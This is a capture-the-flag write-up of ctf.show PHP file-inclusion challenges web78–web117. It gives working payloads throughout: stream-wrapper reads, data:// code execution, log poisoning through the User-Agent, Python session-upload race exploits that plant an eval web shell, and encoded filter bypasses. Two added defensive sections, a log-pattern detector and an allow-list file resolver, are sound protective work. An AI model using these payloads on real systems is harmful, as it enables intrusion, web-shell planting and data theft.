Challenge URL: https://ctf.show/challenges
Being a web noob, I still ran into problems easily while working through these. //87 and 116 didn't work out after some attempts, so I'm leaving a placeholder here and will come back to them later...// (I came back and solved them.)

web78

hint: ?file=php://filter/convert.base64-encode/resource=flag.php

Reading the file through a PHP stream wrapper (php://filter).

payload: ?file=php://filter/convert.base64-encode/resource=flag.php

web79

hint: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

Then view the page source.

web80

hint: include the log file to get a shell; log file path: ?file=/var/log/nginx/access.log
Include the log file to get a shell.

Log file path: ?file=/var/log/nginx/access.log
User-Agent: <?php system('ls');?>
User-Agent: <?php system('cat fl0g.php');?>
Then view the page source to get the flag.

web81

Same as above.

web82-86

hint: https://www.freebuf.com/vuls/202819.html This one is a bit like WMCTF's "make php great again": file inclusion through the session mechanism. https://blog.csdn.net/qq_46091464/article/details/108021053

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

File inclusion via the session file.
exp:

import io
import sys
import requests
import threading

host = 'http://db1ceed2-e997-42ca-bb7a-14ef7922161a.chall.ctf.show/'
sessid = 'vrhtvjd4j1sd88onr92fm9t2sj'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            host,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');echo md5('1');?>"},
            files={"file":('a.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{host}?file=/tmp/sess_{sessid}')
        # print(response.text)
        if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()
    READ(session)

web87

hint:

https://www.leavesongs.com/PENETRATION/php-filter-magic.html https://xz.aliyun.com/t/8163#toc-3 php://filter/write=string.rot13/resource=2.php


Because after the base64 filter only the six characters (phpdie) are left, we need to add two characters so that the part in front can be decoded.
Solution steps:
What I used here is similar: file is php://filter/write=convert.base64-decode/resource=1.php, and content, after removing the two leading a's used as padding, base64-decodes to <?php eval($_POST[0]);?>
The payload is as follows:

file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2577%2572%2569%2574%2565%253d%2563%256f%256e%2576%2565%2572%2574%252e%2562%2561%2573%2565%2536%2534%252d%2564%2565%2563%256f%2564%2565%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%2531%252e%2570%2568%2570

content=aaPD9waHAgZXZhbCgkX1BPU1RbMF0pOz8%2B

Then connect to 1.php with AntSword; the password is the 0 that was written in.
Finally the flag is found in fl0g.php.

web88

hint: quite a lot is filtered, but : is not, so we can use a PHP wrapper. What is used here is data://text/plain;base64,poc, basically the same as web79; the only thing to note is that the = has to be dropped when base64-encoding.

import io
import requests
import threading

sessID = 'flag'
url = 'http://77f10aa2-a5ca-4ab6-9f42-6e43e5717207.chall.ctf.show/'

def write(session):
    while True:
        f = io.BytesIO(b'a' * 256 * 1)  # it is advisable to make this padding larger
        session.post(url,
                     cookies={'PHPSESSID': sessID},
                     data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac *.php");?>'},
                     files={'file': ('a.txt', f)}
                     )

def read():
    while True:
        response = session.get(url + '?file=/tmp/sess_{}'.format(sessID))
        if 'flag' in response.text:
            print(response.text)
            break

session = requests.session()
writer = threading.Thread(target=write, args=(session,))
writer.daemon = True  # with daemon=True the child thread exits together with the main thread once it finishes, whether or not it is still running
writer.start()
read()

In practice it just means dropping the = left after base64 encoding; it only serves as padding and does not affect the result.

?file=data:text/plain,<?php phpinfo()?>
// base64 with the = removed
?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4
payload
?file=data:text/plain;base64,<?php system('ls');?> // this one cannot be executed after encoding because the result contains a +
?file=data:text/plain;base64,<?php system('cat *.php'); ?>
?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgKi5waHAnKTs/Pg
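Added example (mine, not from this writeup): a small Python detector that scans nginx access-log lines for the patterns web78-web88 rely on: stream wrappers in ?file=, inclusion of the nginx log or PHP session files, the double URL-encoding used in web87, and PHP open tags planted in the User-Agent as in web80. The combined log format, the rule names and the sample lines are assumptions constructed for the demo.

```python
import re
from urllib.parse import unquote

# nginx "combined" format: the layout of the /var/log/nginx/access.log included in web80
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
WRAPPER_RE = re.compile(r'^(php|data|phar|zip|expect)\s*:', re.I)  # wrappers that make include() run code
SENSITIVE_PREFIXES = ('/var/log/', '/tmp/sess_')  # nginx logs and PHP session files (web80, web82-86)

def url_decode_fully(value, max_rounds=3):
    """Peel up to max_rounds layers of %-encoding (web87 sends %2570 = '%70' = 'p'); returns (text, layers)."""
    layers = 0
    while layers < max_rounds and unquote(value) != value:
        value, layers = unquote(value), layers + 1
    return value, layers

def classify_file_param(raw):
    """List the reasons a ?file= value looks like an inclusion attack (empty list if none)."""
    value, layers = url_decode_fully(raw)
    reasons = []
    if WRAPPER_RE.match(value):
        reasons.append('stream wrapper: ' + value.split(':', 1)[0].lower())
    if value.startswith(SENSITIVE_PREFIXES):
        reasons.append('sensitive path: ' + value)
    if layers > 1:
        reasons.append(f'{layers}x url-encoded (filter evasion)')
    return reasons

def scan_line(line):
    # flag wrapper/path abuse in ?file= and PHP open tags planted in the User-Agent
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for pair in m.group('target').partition('?')[2].split('&'):
        key, _, val = pair.partition('=')  # split on the first '=' only so base64 padding stays in val
        if key == 'file':
            findings += classify_file_param(val)
    if re.search(r'<\?(php|=)', m.group('ua'), re.I):
        findings.append('php tag in user-agent (log poisoning)')
    return findings

# constructed log lines modelled on the requests shown in web78-web88 (not real traffic)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /index.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4 HTTP/1.1" 200 30000 "-" "Mozilla/5.0"',
    "10.0.0.5 - - [01/Jan/2021:10:00:02 +0000] \"GET /index.php?file=/var/log/nginx/access.log HTTP/1.1\" 200 9000 \"-\" \"<?php system('ls');?>\"",
    '10.0.0.5 - - [01/Jan/2021:10:00:03 +0000] "GET /index.php?file=/tmp/sess_vrhtvjd4j1sd88onr92fm9t2sj HTTP/1.1" 200 64 "-" "python-requests/2.25.1"',
    '10.0.0.5 - - [01/Jan/2021:10:00:04 +0000] "POST /index.php?file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]
```

Running `scan_line` over each entry of SAMPLE_LOG returns the findings per line; a request such as ?file=5.mp4 with an ordinary User-Agent yields an empty list.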

web116

Opening it, you find a mashup of Hong Kong movies, which is actually quite good to watch. Use Burp to include a file directly and get the source:

GET /index.php?file=/var/www/html/index.php

Source:

<?php
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=isset($_GET['file'])?$_GET['file']:"5.mp4";
filter($file);
header('Content-Type: video/mp4');
header("Content-Length: $file");
readfile($file);
?>

Then try including flag.php directly and the flag comes out.
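Added example (mine, not the challenge code): the web116 blacklist ported to Python next to an allow-list resolver, showing that the deny-list passes the exact paths used above while path containment plus an extension check refuses them. The media directory /srv/media, the function names and the allowed extension are assumptions.

```python
import os
import re

# the substring deny-list from the web116 source above, applied to the raw parameter
BLACKLIST_RE = re.compile(r'http|https|data|input|rot13|base64|string|log|sess', re.I)

def blacklist_allows(file_param):
    """True when web116's filter() would pass the value on to readfile()."""
    return not BLACKLIST_RE.search(file_param)

def resolve_allowlisted(file_param, media_dir, allowed_ext=('.mp4',)):
    """Allow-list design (assumed here, not the challenge's code): the request may only
    name a file under media_dir with an expected extension, judged after normalisation.
    Returns the absolute path to serve, or None when the request must be refused."""
    base = os.path.realpath(media_dir)
    # join() discards base for absolute input, so '/var/www/html/index.php' lands
    # outside base and the containment check below rejects it; symlinks are resolved first
    candidate = os.path.realpath(os.path.join(base, file_param))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not candidate.lower().endswith(tuple(allowed_ext)):
        return None
    return candidate

# the default file plus the two paths read in the writeup; the blacklist passes all of them
REQUESTS = ['5.mp4', '/var/www/html/index.php', 'flag.php']

def compare(media_dir='/srv/media'):
    """Side-by-side verdict (blacklist allows, allow-list allows) for each request."""
    return {r: (blacklist_allows(r), resolve_allowlisted(r, media_dir) is not None) for r in REQUESTS}
```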

web117

hint: payload: file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php post: contents=??
Note: the exploitation method depends on the environment; since environment variables differ from machine to machine, the effect differs too.
Knowledge points:
https://www.cnblogs.com/harrymore/p/5121444.html

https://blog.51cto.com/allenh/1695810

${PATH:1:1} to obtain a letter

${#PATH} to count the number of letters
Similar to web87: try bypassing the die by a means other than rot13 and base64.

See the second link recommended under web87.

payload

file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post: contents=??
Then open url/a.php
You can pass 1=phpinfo(); to test it
Then pass 1=system('cat flag.php'); and view the source to get the flag.
